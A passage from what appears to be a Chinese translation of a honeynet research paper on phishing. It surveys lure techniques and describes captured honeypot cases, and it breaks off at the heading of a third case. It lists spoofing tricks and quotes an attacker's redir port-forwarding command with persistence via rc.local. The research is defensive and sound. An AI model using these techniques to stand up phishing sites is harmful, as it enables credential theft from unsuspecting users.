在給出一個(gè)簡(jiǎn)要的引言和背景介紹后,我們將回顧釣魚者實(shí)際使用的技術(shù)和工具,給出使用蜜網(wǎng)技術(shù)捕獲真實(shí)世界中的網(wǎng)絡(luò)釣魚攻擊的三個(gè)實(shí)驗(yàn)型研究的案例。這些攻擊案例將詳細(xì)地進(jìn)行描述,包括系統(tǒng)入侵、釣魚網(wǎng)站架設(shè)、消息傳播和數(shù)據(jù)收集等階段。隨后,將對(duì)其中普遍應(yīng)用的技術(shù)及網(wǎng)絡(luò)釣魚、垃圾郵件和僵尸網(wǎng)絡(luò)等技術(shù)進(jìn)行融合的趨勢(shì)給出分析。釣魚者使用惡意軟件進(jìn)行自動(dòng)化地 Email 地址收集和垃圾郵件發(fā)送的案例也將被回顧,同時(shí)我們也將展示我們?cè)诰W(wǎng)絡(luò)掃描技術(shù)及被攻陷主機(jī)如何被用于傳播釣魚郵件和其他垃圾郵件上的發(fā)現(xiàn)。最后,我們對(duì)本文給出結(jié)論,包括我們?cè)谧罱?6 個(gè)月內(nèi)獲得的經(jīng)驗(yàn),以及我們建議的進(jìn)一步研究的客體。
這篇文章包括了豐富的支持性信息,提供了包含特定的網(wǎng)絡(luò)釣魚攻擊案例更詳細(xì)數(shù)據(jù)的鏈接。最后聲明一下,在研究過(guò)程中,我們沒有收集任何機(jī)密性的個(gè)人數(shù)據(jù)。在一些案例中,我們與被涉及網(wǎng)絡(luò)釣魚攻擊的組織進(jìn)行了直接聯(lián)系,或者將這些攻擊相關(guān)的數(shù)據(jù)轉(zhuǎn)交給當(dāng)?shù)氐膽?yīng)急響應(yīng)組織。
引言
欺騙別人給出口令或其他敏感信息的方法在黑客界已經(jīng)有一個(gè)悠久的歷史。傳統(tǒng)上,這種行為一般以社交工程的方式進(jìn)行。在二十世紀(jì)九十年代,隨著互聯(lián)網(wǎng)所連接的主機(jī)系統(tǒng)和用戶量的飛速增長(zhǎng),攻擊者開始將這個(gè)過(guò)程自動(dòng)化,從而攻擊數(shù)量巨大的互聯(lián)網(wǎng)用戶群體。最早系統(tǒng)性地對(duì)這種攻擊行為進(jìn)行的研究工作在 1998 年由 Gordon 和 Chess 發(fā)表。( Sarah Gordon, David M. Chess: Where There's Smoke, There's Mirrors: The Truth about Trojan Horses on the Internet , presented at the Virus Bulletin Conference in Munich, Germany, October 1998 ) Gordon 和 Chess 研究針對(duì) AOL (美國(guó)在線)的惡意軟件,但實(shí)際上他們面對(duì)的是網(wǎng)絡(luò)釣魚的企圖而不是他們所期望的特洛伊木馬攻擊。網(wǎng)絡(luò)釣魚 (Phishing) 這個(gè)詞 (password harvesting fishing) 描述了通過(guò)欺騙手段獲取敏感個(gè)人信息如口令、信用卡詳細(xì)信息等的攻擊方式,而欺騙手段一般是假冒成確實(shí)需要這些信息的可信方。 Gordon 和 Chess 描述的一個(gè)釣魚信件如下所示:
Sector 4G 9E of our data base has lost all I/O functions. When your account
logged onto our system, we were temporarily able to verify it as a
registered user. Approximately 94 seconds ago, your verification was made
void by loss of data in the Sector 4G 9E. Now, due to AOL verification
protocol, it is mandatory for us to re-verify you. Please click 'Respond' and
re-state your password. Failure to comply will result in immediate account
deletion.
早期的網(wǎng)絡(luò)釣魚攻擊主要目的是獲得受害者的 AOL 賬號(hào)的訪問(wèn)權(quán),偶爾也期望獲取信用卡數(shù)據(jù)以用于欺詐目的 ( 如非法買賣這些信息 ) 。這些釣魚的信件通常包含一個(gè)簡(jiǎn)單的詭計(jì)從而哄騙一些“菜鳥”用戶,這些欺騙手段很大程度依賴于受害者對(duì)“自動(dòng)化的”系統(tǒng)功能或權(quán)威機(jī)構(gòu)的(表面)輪廓的先天性信任,前面的例子中給出一個(gè)硬件設(shè)備故障或數(shù)據(jù)庫(kù)毀壞的情節(jié),大部分的普通用戶將會(huì)重視任何看起來(lái)正式的、或看起來(lái)向是為他們提供幫助的緊急的技術(shù)上的要求,用戶通常會(huì)被催促盡快輸入其敏感信息從而避免嚴(yán)重后果,如“ … 重新輸入你的口令,如未及時(shí)輸入則將導(dǎo)致直接刪除賬號(hào)”。為了避免可能潛在的嚴(yán)重的后果,受害者通常立即照做,從而不知不覺地將這些使用此社交工程手段的黑客所需要的敏感數(shù)據(jù)提供給了他們。事后的證據(jù)表明這些黑客都是單獨(dú)行動(dòng),或是以一個(gè)小而簡(jiǎn)單的組織形式活動(dòng)。一些文獻(xiàn)也描述了早期的網(wǎng)絡(luò)釣魚者大多是一些期望獲得更多賬號(hào)數(shù)據(jù)去惡作劇及打長(zhǎng)途電話的青少年,通常沒有很強(qiáng)的組織性和蓄意性。
現(xiàn)在,釣魚者所首選的策略是通過(guò)大量散發(fā)誘騙郵件,冒充成一個(gè)可信的組織機(jī)構(gòu)(通常是那些釣魚者所期望的已經(jīng)被受害者所信任的機(jī)構(gòu)),去引誘盡可能多的終端用戶。釣魚者會(huì)發(fā)出一個(gè)讓用戶采取緊急動(dòng)作的請(qǐng)求,而具有諷刺意義的是通常其理由是保護(hù)用戶的機(jī)密性數(shù)據(jù)免受惡意活動(dòng)的侵害,這封欺騙性的電子郵件將會(huì)包含一個(gè)容易混淆的鏈接,指向一個(gè)假冒目標(biāo)機(jī)構(gòu)公開網(wǎng)站的遠(yuǎn)程網(wǎng)頁(yè)。釣魚者希望受害者能夠被欺騙,從而向這個(gè)假的、但看起來(lái)是目標(biāo)機(jī)構(gòu)的“官方”網(wǎng)站的網(wǎng)頁(yè)接口輸入他們的機(jī)密信息。被釣魚者所青睞的目標(biāo)機(jī)構(gòu)包括很多著名的銀行,信用卡公司和涉及日常性支付行為的知名互聯(lián)網(wǎng)商務(wù)網(wǎng)站(如 eBay 和 Paypal 等 )。大量針對(duì)互聯(lián)網(wǎng)用戶的釣魚郵件的實(shí)例可以在反網(wǎng)絡(luò)釣魚工作組 ( Anti-Phishing Working Group )的網(wǎng)站上 的 釣魚郵件歸檔 中 可以獲得,其中許多郵件都顯示了釣魚者可以欺騙無(wú)知的用戶相信他們正在訪問(wèn)一個(gè)合法的網(wǎng)頁(yè)接口的極高精確性。
在這個(gè)簡(jiǎn)要介紹網(wǎng)絡(luò)釣魚概念的引言之后,我們將開始回顧在我們觀察到的真實(shí)網(wǎng)絡(luò)釣魚攻擊中所實(shí)際使用的技術(shù)和工具。如果你對(duì)網(wǎng)絡(luò)釣魚的更深入的背景知識(shí)感興趣,我們?yōu)槟銣?zhǔn)備了 具體的背景信息 這個(gè)頁(yè)面。
工具和策略
網(wǎng)絡(luò)釣魚攻擊一般僅利用一些簡(jiǎn)單的工具和技術(shù)來(lái)欺騙無(wú)戒備心的用戶。支撐一次網(wǎng)絡(luò)釣魚攻擊的底層基礎(chǔ)設(shè)施可以是最基本的簡(jiǎn)單地拷貝一個(gè) HTML 頁(yè)面,上傳到一個(gè)剛剛攻陷的網(wǎng)站服務(wù)器,以及一個(gè)服務(wù)器端的用來(lái)處理用戶輸入數(shù)據(jù)的腳本,也可能涉及更為復(fù)雜的網(wǎng)站及內(nèi)容重定向,但他們的底層目標(biāo)是一致的——架設(shè)一個(gè)假冒可信機(jī)構(gòu)的網(wǎng)站,并部署一些必需的后臺(tái)腳本處理用戶的輸入數(shù)據(jù)并讓攻擊者獲取。使用最新的 HTML 編輯工具可以非常容易地構(gòu)建出模仿目標(biāo)組織機(jī)構(gòu)的網(wǎng)站,同時(shí)如果攻擊者不介意掃描互聯(lián)網(wǎng) IP 地址空間以尋找潛在的有漏洞的主機(jī),缺乏有效的安全防護(hù)的網(wǎng)站服務(wù)器也能夠非常容易地找到并被攻陷。一旦被攻陷,即使是家庭用的 PC 主機(jī)都可以作為釣魚網(wǎng)站的宿主主機(jī),所以釣魚者的攻擊目標(biāo)不僅僅是知名的企業(yè)和學(xué)院里的系統(tǒng)。攻擊者經(jīng)常不分青紅皂白地去選擇他們的目標(biāo)主機(jī),而僅僅是在一個(gè)大的 IP 地址空間中隨機(jī)地掃描,尋找可被利用的特定的安全漏洞。
一旦釣魚者建立起一個(gè)模仿可信機(jī)構(gòu)的真實(shí)且能夠讓人信以為真的假冒網(wǎng)站后,對(duì)他們的重要挑戰(zhàn)是如何將用戶從一個(gè)合法的網(wǎng)站轉(zhuǎn)移到訪問(wèn)他們所架設(shè)的假冒網(wǎng)站。除非釣魚者有能力去改變目標(biāo)網(wǎng)站的 DNS 解析(稱為 DNS 中毒攻擊 )或采取其他方式對(duì)網(wǎng)絡(luò)流量進(jìn)行重定向(稱為 pharming 的一種技術(shù)),他們必須依賴某種形式的內(nèi)容上的欺騙技巧,去引誘不幸的用戶去訪問(wèn)假冒的網(wǎng)站。欺騙技巧的質(zhì)量越高,他們所撒的漁網(wǎng)就越寬,一個(gè)無(wú)知的用戶錯(cuò)誤地訪問(wèn)這個(gè)假冒網(wǎng)站(并提供給釣魚者他的機(jī)密信息和私人數(shù)據(jù))的機(jī)會(huì)就越大。
對(duì)攻擊者不幸的是,當(dāng)他們假冒一個(gè)組織結(jié)構(gòu)(如一個(gè)銀行或可信的商務(wù)網(wǎng)站),釣魚者通常沒有任何互聯(lián)網(wǎng)上哪些用戶屬于他們的客戶此類信息,也就不知道哪些用戶最容易上鉤。即使釣魚者可以將指向假冒網(wǎng)站的鏈接發(fā)布到與目標(biāo)機(jī)構(gòu)相關(guān)的一些聊天室或論壇上(如一個(gè)技術(shù)支持網(wǎng)站或網(wǎng)絡(luò)社區(qū)談?wù)摻M),目標(biāo)機(jī)構(gòu)很可能比較迅速地被通知并做出反應(yīng),這個(gè)鏈接也會(huì)在很多受害者訪問(wèn)它所指向的內(nèi)容并提交他們的個(gè)人信息前被清除。同時(shí)對(duì)釣魚者也存在一個(gè)顯著的風(fēng)險(xiǎn),目標(biāo)機(jī)構(gòu)或法律執(zhí)行部門可能會(huì)追蹤并關(guān)閉這些假冒的網(wǎng)站。因此,釣魚者需要一個(gè)方法,能夠在盡量減少他們所承擔(dān)的風(fēng)險(xiǎn)的同時(shí),在短時(shí)間內(nèi)欺騙盡可能多的潛在受害群體,他們找到了理想的犯罪搭檔——垃圾郵件。
垃圾郵件發(fā)送者擁有包括幾百萬(wàn)使用中電子郵件地址的數(shù)據(jù)庫(kù),因此最新的垃圾郵件群發(fā)技術(shù)可以用來(lái)幫助一個(gè)釣魚者低風(fēng)險(xiǎn)廣泛地發(fā)布他們的誘騙郵件。垃圾郵件通常通過(guò)一些被攻陷的架設(shè)在境外主機(jī)上的郵件服務(wù)器,或是通過(guò)一個(gè)全球的傀儡主機(jī)網(wǎng)絡(luò) ( botnets ) 進(jìn)行發(fā)送,因此郵件發(fā)送者被追蹤的可能性將會(huì)很小。如果一個(gè)無(wú)戒備心的用戶收到一封看起來(lái)像是由他們的銀行所發(fā)來(lái)的,帶有銀行正式標(biāo)志的電子郵件,要求他們?cè)L問(wèn)一個(gè)看起來(lái)與銀行官方網(wǎng)站一摸一樣的網(wǎng)站并由于安全理由更改他們?cè)诰€的銀行口令,這比起那些介紹新奇產(chǎn)品并鏈接到未知網(wǎng)站的普通垃圾郵件來(lái)更可能使得用戶上當(dāng)。為了增加用戶相信這個(gè)郵件是真實(shí)的可能性,釣魚者會(huì)應(yīng)用一些另外的技術(shù)來(lái)進(jìn)一步提高他們所進(jìn)行的誘捕手段的質(zhì)量:
在指向假冒網(wǎng)站的鏈接中使用 IP 地址代替域名。一些無(wú)戒備心的用戶將不會(huì)檢查(或不知道如何檢查)這個(gè) IP 地址是否來(lái)自假冒網(wǎng)站頁(yè)面上所聲稱的目標(biāo)機(jī)構(gòu)。
注冊(cè)發(fā)音相近或形似的 DNS 域名(如 b1gbank.com 或 bigbnk.com 假冒 bigbank.com ),并在上面架設(shè)假冒網(wǎng)站,期望用戶不會(huì)發(fā)現(xiàn)他們之間的差異。
在一個(gè)假冒釣魚網(wǎng)站的電子郵件 HTML 內(nèi)容中嵌入一些指向真實(shí)的目標(biāo)網(wǎng)站的鏈接,從而使得用戶的網(wǎng)站瀏覽器的大多數(shù) HTTP 連接是指向真實(shí)的目標(biāo)網(wǎng)站,而僅有少數(shù)的關(guān)鍵連接(如提交敏感信息的頁(yè)面)指向假冒的網(wǎng)站。如果用戶的電子郵件客戶端軟件支持 HTML 內(nèi)容的自動(dòng)獲取,那會(huì)在電子郵件被讀取的時(shí)候自動(dòng)地連接假冒網(wǎng)站,手動(dòng)地瀏覽也不會(huì)在大量與真實(shí)網(wǎng)站的正常網(wǎng)絡(luò)活動(dòng)中注意到少量與惡意服務(wù)器的連接。
對(duì)假冒網(wǎng)站的 URL 進(jìn)行編碼和混淆,很多用戶不會(huì)注意到或者理解 URL 鏈接被做過(guò)什么處理,并會(huì)假設(shè)它是良性的。 IDN 欺騙技術(shù)( IDN spoofing )就是這樣的一種技術(shù),它使用 Unicode 編碼的 URL 在瀏覽器的地址欄里呈現(xiàn)的看起來(lái)像是真實(shí)的網(wǎng)站地址,但實(shí)際上卻指向一個(gè)完全不同的地址。
企圖攻擊用戶網(wǎng)頁(yè)瀏覽器存在的漏洞,使之隱藏消息內(nèi)容的實(shí)質(zhì)。微軟的 IE 和 Outlook 都被發(fā)現(xiàn)過(guò)存在可以被這種技術(shù)攻擊的漏洞(如 地址欄假冒 和 IFrame element 漏洞 )。
將假冒的釣魚網(wǎng)站配置成記錄用戶提交的所有數(shù)據(jù)并進(jìn)行不可察覺的日志,然后將用戶重定向到真實(shí)的網(wǎng)站。這將導(dǎo)致一個(gè)“口令錯(cuò)誤,請(qǐng)重試”錯(cuò)誤,或甚至完全透明,但在每種情況下,大部分用戶都不會(huì)發(fā)覺,更相信是自己的錯(cuò)誤輸入,而不會(huì)想到是由于惡意第三方的干涉。
架設(shè)一個(gè)假冒網(wǎng)站,作為目標(biāo)機(jī)構(gòu)真實(shí)網(wǎng)站的代理,并偷摸地記錄未使用 SSL 加密保護(hù)的口令信息(或甚至為假冒的域名注冊(cè)一個(gè)有效的 SSL 證書從而對(duì) SSL 加密保護(hù)的口令信息進(jìn)行記錄)。
首先通過(guò)惡意軟件在受害者的 PC 上首先安裝一個(gè)惡意的瀏覽器助手工具( Browser Helper Object ),然后由其將受害者重定向到假冒的釣魚網(wǎng)站。 BHO 是一些設(shè)計(jì)用于定制和控制 IE 瀏覽器的 DLL ,如果成功,受害者將會(huì)被欺騙,相信他們正在訪問(wèn)合法的網(wǎng)站內(nèi)容,然而實(shí)際上卻在訪問(wèn)一個(gè)假冒的釣魚網(wǎng)站。
使用惡意軟件去修改受害者 PC 上的用來(lái)維護(hù)本地 DNS 域名和 IP 地址映射的 hosts 文件,這將使得他們的網(wǎng)頁(yè)瀏覽器在連接架設(shè)假冒釣魚網(wǎng)站的服務(wù)器時(shí),卻讓用戶看起來(lái)像是訪問(wèn)目標(biāo)機(jī)構(gòu)的合法網(wǎng)站。
由于很多電子商務(wù)或在線銀行應(yīng)用的復(fù)雜性,他們的網(wǎng)站經(jīng)常使用 HTML 框架結(jié)構(gòu)或其他復(fù)雜的頁(yè)面結(jié)構(gòu)架設(shè),這也可能使得一個(gè)終端用戶很難判斷一個(gè)特定的網(wǎng)頁(yè)是否合法。上述列舉的這些技術(shù)的組合使用可以隱藏一個(gè)精心設(shè)計(jì)的網(wǎng)頁(yè)的真實(shí)來(lái)源,也使得一個(gè)無(wú)戒備心的用戶很可能被引誘去訪問(wèn)釣魚者的假冒網(wǎng)站,不知不覺地泄漏他們的認(rèn)證口令信息和所需要的數(shù)字身份信息,從而成為一次成功的網(wǎng)絡(luò)釣魚攻擊的又一個(gè)受害者。 #p#副標(biāo)題#e#
真實(shí)世界的網(wǎng)絡(luò)釣魚技術(shù)
互聯(lián)網(wǎng)用戶也經(jīng)常在他們自己收到欺騙性郵件發(fā)覺網(wǎng)絡(luò)釣魚攻擊,也常常在釣魚網(wǎng)站所臨時(shí)架設(shè)的主機(jī)被 關(guān)閉很長(zhǎng)時(shí)間后在技術(shù)新聞?wù)军c(diǎn)上看到這些惡意網(wǎng)站的記錄副本,但這些事件只能被孤立從受害者的角度去觀察。蜜網(wǎng)技術(shù)能夠提供的一個(gè)最大的優(yōu)勢(shì)在于其能夠從攻擊者角度捕獲全部行為的能力,使得安全分析員能夠?qū)W(wǎng)絡(luò)釣魚攻擊的整個(gè)生命周期建立起一個(gè)完整的理解,來(lái)自蜜網(wǎng)研究聯(lián)盟的成員們非常幸運(yùn)地捕獲了豐富的網(wǎng)絡(luò)釣魚攻擊數(shù)據(jù)集,能夠幫助他們了解真實(shí)的一次網(wǎng)絡(luò)釣魚攻擊的全過(guò)程,從最初主機(jī)被攻陷、釣魚網(wǎng)站的架設(shè)、群發(fā)垃圾郵件、到最后的受害者數(shù)據(jù)捕獲。三個(gè)反映典型的真實(shí)世界網(wǎng)絡(luò)釣魚攻擊技術(shù)的實(shí)際案例將在下面被展示和分析。
第一種網(wǎng)絡(luò)釣魚技術(shù)-通過(guò)攻陷的網(wǎng)站服務(wù)器釣魚
大部分我們觀察到真實(shí)世界中的網(wǎng)絡(luò)釣魚攻擊涉及到攻擊者攻入有漏洞的服務(wù)器,并安裝惡意的網(wǎng)頁(yè)內(nèi)容。蜜網(wǎng)技術(shù)使得我們可以捕獲一次網(wǎng)絡(luò)釣魚攻擊的生命周期中的詳細(xì)數(shù)據(jù),在我們觀察到的這些攻擊事件中,普遍地存在如下一些事件:
攻擊者掃描網(wǎng)段,尋找有漏洞的服務(wù)器
服務(wù)器被攻陷,并安裝一個(gè) rootkit 或口令保護(hù)的后門工具
釣魚者從加密的后門工具獲得對(duì)服務(wù)器的訪問(wèn)權(quán)
如果這個(gè)被攻陷的服務(wù)器是一個(gè)網(wǎng)站服務(wù)器,則下載已構(gòu)建完畢的釣魚網(wǎng)站內(nèi)容
進(jìn)行有限的一些內(nèi)容配置和網(wǎng)站測(cè)試工作(這也潛在地預(yù)示著第一次訪問(wèn)釣魚網(wǎng)站的 IP 地址可能是釣魚者的真實(shí) IP 地址)
群發(fā)電子郵件工具被下載,并用以大規(guī)模散發(fā)包含假冒釣魚網(wǎng)站信息的欺騙性垃圾郵件
網(wǎng)頁(yè)瀏覽的流量開始到達(dá)釣魚網(wǎng)站,潛在的受害者開始訪問(wèn)惡意的網(wǎng)頁(yè)內(nèi)容
通常情況下,網(wǎng)站釣魚攻擊的生命周期從釣魚網(wǎng)站發(fā)布到互聯(lián)網(wǎng)上后只有幾個(gè)小時(shí)或幾天的時(shí)間,我們的研究也發(fā)現(xiàn)網(wǎng)絡(luò)釣魚攻擊在多臺(tái)服務(wù)器上針對(duì)多個(gè)組織機(jī)構(gòu)在同時(shí)并行進(jìn)行。我們將使用兩個(gè)典型的網(wǎng)絡(luò)釣魚攻擊的實(shí)際案例所捕獲的數(shù)據(jù)來(lái)進(jìn)行闡述這些原理,其中一個(gè)案例是由德國(guó)蜜網(wǎng)項(xiàng)目組觀察到,另一個(gè)由英國(guó)蜜網(wǎng)項(xiàng)目組觀察到。在每個(gè)案例中,蜜網(wǎng)研究聯(lián)盟的成員們都部署了有漏洞的 Linux 蜜罐,對(duì)這兩個(gè)蜜罐的攻陷過(guò)程顯示了相同的攻擊模式:蜜罐的被掃描和被攻陷具有非常強(qiáng)的連續(xù)性,并包括預(yù)先創(chuàng)建的釣魚網(wǎng)站和群發(fā)垃圾郵件工具的上傳和使用。與我們觀察到的幾次其他的案例中類似, Rootkit 和 IRC 服務(wù)器也同時(shí)在攻擊過(guò)程中被安裝,被攻陷的蜜罐同時(shí)被用以除網(wǎng)絡(luò)釣魚外的其他目的:如作為一個(gè)由羅馬尼亞攻擊者控制的 IRC 傀儡主機(jī),同時(shí)也作為一個(gè)網(wǎng)絡(luò)掃描器用以發(fā)現(xiàn)和攻擊更多潛在的計(jì)算機(jī)(盡管蜜網(wǎng)體系框架阻止攻擊者從被攻陷的蜜罐成功的攻擊其他的服務(wù)器)。一些令人關(guān)注的差異也是非常顯然的,不僅僅是在英國(guó)蜜網(wǎng)項(xiàng)目組觀察到的案例中,也就是多個(gè)不同的組織幾乎同時(shí)訪問(wèn)了被攻陷的主機(jī),使得取證分析更加復(fù)雜。由于篇幅的限制,我們沒有在本文中給出這些攻擊的具體細(xì)節(jié),而僅僅給出了我們所得到的經(jīng)驗(yàn)以及釣魚者如何進(jìn)行網(wǎng)絡(luò)釣魚攻擊。如果你對(duì)這些特定的攻擊過(guò)程的更多具體細(xì)節(jié)感興趣,你可以訪問(wèn)以下頁(yè)面中的信息。
從對(duì)在這些案例中由攻擊者下載的釣魚網(wǎng)站內(nèi)容的分析中可以明顯的看出,釣魚者在同時(shí)以多個(gè)知名的在線組織結(jié)構(gòu)為假冒目標(biāo)。預(yù)先精心構(gòu)造、有官方標(biāo)志的假冒釣魚網(wǎng)站被例行性地部署到被攻陷的主機(jī)上-經(jīng)常通過(guò)以不同的網(wǎng)頁(yè)服務(wù)器根目錄進(jìn)行分離的“子站點(diǎn)”來(lái)同時(shí)架設(shè)多個(gè)組織結(jié)構(gòu)的釣魚網(wǎng)站,同時(shí)安裝將垃圾郵件傳播給潛在的受害者的必需工具。在英國(guó)蜜網(wǎng)項(xiàng)目組觀察到的案例中,從 FTP 會(huì)話所列出的目錄列表中可以確認(rèn)這些攻擊者已經(jīng)很深的卷入垃圾郵件和網(wǎng)絡(luò)釣魚攻擊中,預(yù)先構(gòu)建的網(wǎng)站內(nèi)容和郵件傳播攻擊被集中存放在一個(gè)集中的服務(wù)器上,并且看起來(lái)攻擊的目標(biāo)至少針對(duì) eBay 、 AOL 和其他幾個(gè)知名的美國(guó)銀行。這些個(gè)別的網(wǎng)絡(luò)釣魚攻擊看起來(lái)并不是隔離的單獨(dú)的攻擊事件,因?yàn)樵谶@些案例中發(fā)布的垃圾郵件通常將受害者指向到幾個(gè)同時(shí)存在的假冒網(wǎng)站服務(wù)器,同時(shí)這些垃圾郵件也同時(shí)是從多個(gè)系統(tǒng)中發(fā)出。從英國(guó)案例中蜜罐被攻擊后第一個(gè)連入對(duì)釣魚網(wǎng)站內(nèi)容的 HTTP 請(qǐng)求也預(yù)示著并行的網(wǎng)絡(luò)釣魚攻擊操作在進(jìn)行。
這個(gè)連入蜜罐的 HTTP 連接在攻擊者在這臺(tái)蜜罐主機(jī)上架設(shè)假冒的在線銀行網(wǎng)站之前就已經(jīng)發(fā)生,這確認(rèn)了攻擊者已經(jīng)預(yù)先知道這臺(tái)服務(wù)器可以被用來(lái)作為一個(gè)釣魚網(wǎng)站的假設(shè)。在攻擊者在架設(shè)這個(gè)釣魚網(wǎng)站的同時(shí),引誘受害者訪問(wèn)這個(gè)新釣魚網(wǎng)站的垃圾郵件已經(jīng)從另外一臺(tái)主機(jī)上發(fā)出。
我們對(duì)連入被攻陷的蜜罐請(qǐng)求假冒在線銀行內(nèi)容的 HTTP 請(qǐng)求連接的源 IP 地址數(shù)量和范圍感到震驚。下面的圖給出了在蜜罐從網(wǎng)絡(luò)中斷開前從各個(gè) IP 地址訪問(wèn)釣魚網(wǎng)站的 HTTP 請(qǐng)求的數(shù)目(包括每個(gè) IP 單獨(dú)計(jì)算和全部的 HTTP 請(qǐng)求)。
訪問(wèn)英國(guó)蜜網(wǎng)項(xiàng)目組部署蜜罐上的釣魚網(wǎng)站內(nèi)容的源 IP 地址的頂層 DNS 域名、國(guó)家和主機(jī)操作系統(tǒng)的列表見 此頁(yè)面。要注意的是,在蜜罐被離線進(jìn)行取證分析之前,盡管訪問(wèn)釣魚網(wǎng)站的網(wǎng)頁(yè)流量到達(dá)英國(guó)蜜網(wǎng)項(xiàng)目組部署的蜜罐,但并沒有針對(duì)處理用戶數(shù)據(jù)處理的 PHP 腳本的 HTTP POST 請(qǐng)求,因此在此次網(wǎng)絡(luò)釣魚攻擊中,沒有任何用戶的信息被釣魚者和我們獲得。在本文提及的所有案例中,我們或是直接通報(bào)了目標(biāo)機(jī)構(gòu)關(guān)于攻擊案例和任何相關(guān)的他們所需的相關(guān)數(shù)據(jù),或是向當(dāng)?shù)氐挠?jì)算機(jī)應(yīng)急響應(yīng)組通報(bào)了所有相關(guān)的惡意行為。在所有案例中,沒有任何受害者的私人信息被蜜網(wǎng)項(xiàng)目組和蜜網(wǎng)研究聯(lián)盟的成員所捕獲。
從這兩個(gè)案例中的數(shù)據(jù)表明釣魚者是非常活躍并且具有組織性的,在多個(gè)被攻陷的主機(jī)中快速地移動(dòng),并且同時(shí)以多個(gè)著名的組織結(jié)構(gòu)為目標(biāo)。同時(shí)數(shù)據(jù)也顯示許多電子郵件用戶被引誘訪問(wèn)假冒組織機(jī)構(gòu)(如在線銀行和商務(wù)網(wǎng)站)的釣魚網(wǎng)站,網(wǎng)絡(luò)釣魚攻擊已經(jīng)給廣大的互聯(lián)網(wǎng)用戶帶來(lái)了安全風(fēng)險(xiǎn)。 #p#副標(biāo)題#e#
第二種網(wǎng)絡(luò)釣魚技術(shù)-通過(guò)端口重定向釣魚
在 2004 年 11 越,德國(guó)蜜網(wǎng)項(xiàng)目組部署了包含一個(gè) Redhat Linux 7.3 蜜罐的經(jīng)典 第二代蜜網(wǎng)。雖然安裝的是相當(dāng)舊的操作系統(tǒng)版本,攻擊者也能夠非常容易就能攻破,但它令人驚訝地經(jīng)過(guò)了兩個(gè)半月后才被首次成功攻陷-這和以上提及案例中討論的蜜罐快速被攻陷的情況形成顯著的反差。更多關(guān)于此趨勢(shì)的信息可以在“了解你的敵人”系列文章中的“ 了解你的敵人:趨勢(shì)分析 ”中可以找到。
在 2005 年 1 月 11 日 ,一個(gè)攻擊者成功地攻陷了這臺(tái)蜜罐,使用了針對(duì) Redhat Linux 7.3 缺省安裝存在的 OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability 的攻擊腳本。此案例不尋常的是當(dāng)攻擊者獲得被攻陷主機(jī)的訪問(wèn)權(quán)后,他并沒有直接上傳釣魚網(wǎng)站內(nèi)容。取而代之的是,攻擊者在蜜罐上安裝并配置了一個(gè)端口重定向服務(wù)。
這個(gè)端口重定向服務(wù)被設(shè)計(jì)成將發(fā)往該蜜罐網(wǎng)站服務(wù)器的 HTTP 請(qǐng)求以透明的方式重新路由到另外一個(gè)遠(yuǎn)程的網(wǎng)站服務(wù)器,這種方式潛在地使得對(duì)釣魚網(wǎng)站內(nèi)容更難追蹤。攻擊者下載并在蜜罐上安裝了一個(gè)稱為 redir 的工具,此工具是一個(gè)能夠透明地將連入的 TCP 連接轉(zhuǎn)發(fā)到一個(gè)遠(yuǎn)程的目標(biāo)主機(jī)的端口 重定向器。在此次案例中,攻擊者配置該工具將所有到蜜罐 TCP 80 端口( HTTP )的流量重定向到一個(gè)位于 中國(guó) 的遠(yuǎn)程網(wǎng)站服務(wù)器的 TCP 80 端口。有意思的是,攻擊者并沒有在蜜罐上安裝 Rootkit 以隱藏他的存在,這也說(shuō)明攻擊者并沒有把被攻陷的主機(jī)的價(jià)值看的很重,同時(shí)并不擔(dān)心被檢測(cè)到。
攻擊者使用的建立端口重定向的指令如下:
redir --lport=80 --laddr=<IP address of honeypot> --cport=80 --caddr=221.4.XXX.XXX
另外,攻擊者修改了 Linux 系統(tǒng)的啟動(dòng)腳本文件 /etc/rc.d/rc.local 從而保證 redir 端口重定向服務(wù)在蜜罐系統(tǒng)重新啟動(dòng)后也會(huì)被重新啟動(dòng),提高了他們的端口重定向服務(wù)的生存能力。然后他們開始往外發(fā)送釣魚垃圾郵件以引誘受害者訪問(wèn)此蜜罐,一個(gè)示例可以在 此 找到。(注意相關(guān)的敏感信息已經(jīng)被混淆了)。
為了進(jìn)一步調(diào)查攻擊者的活動(dòng),德國(guó)蜜網(wǎng)項(xiàng)目組的成員們干涉并偷偷摸摸修改了攻擊者在蜜罐上安裝的 redire 工具的配置,使其在 redir 程序內(nèi)進(jìn)行日志,使得更容易地觀察到多少人接收到此垃圾郵件信息,并點(diǎn)擊了其中的鏈接透明地訪問(wèn)重定向后的釣魚網(wǎng)站內(nèi)容。在將近 36 小時(shí)的時(shí)間段內(nèi), 721 個(gè) IP 地址被 redir 重定向到釣魚網(wǎng)站,我們又一次對(duì)這么多用戶被發(fā)布的釣魚郵件所引誘訪問(wèn)釣魚網(wǎng)站內(nèi)容而感到震驚。對(duì)訪問(wèn)端口重定向器的 IP 地址的分析可以在 這找到(注意這些信息已經(jīng)被清潔過(guò),以保護(hù)訪問(wèn)釣魚網(wǎng)站的用戶,同時(shí)在我們的研究中僅記錄了 IP 地址數(shù)據(jù),任何機(jī)密性的用戶數(shù)據(jù)沒有被捕獲)。
本次攻擊案例的一個(gè)概要時(shí)間線如下表所示:
日期 / 時(shí)間
事件
2004 年 11 月 1 日
蜜罐受到首次掃描
2005 年 1 月 11 日 19:13
蜜罐上的 OpenSSL 服務(wù)被攻陷,端口重定向器被安裝, 釣魚垃圾郵件 被發(fā)送。
2005 年 1 月 11 日 20:07
對(duì)釣魚網(wǎng)站內(nèi)容的 網(wǎng)頁(yè)請(qǐng)求 開始到達(dá)蜜罐。
2005 年 1 月 13 日 8:15
蜜罐被離線進(jìn)行取證分析。
第三種網(wǎng)絡(luò)釣魚技術(shù)-通過(guò)僵尸網(wǎng)絡(luò)進(jìn)行釣魚
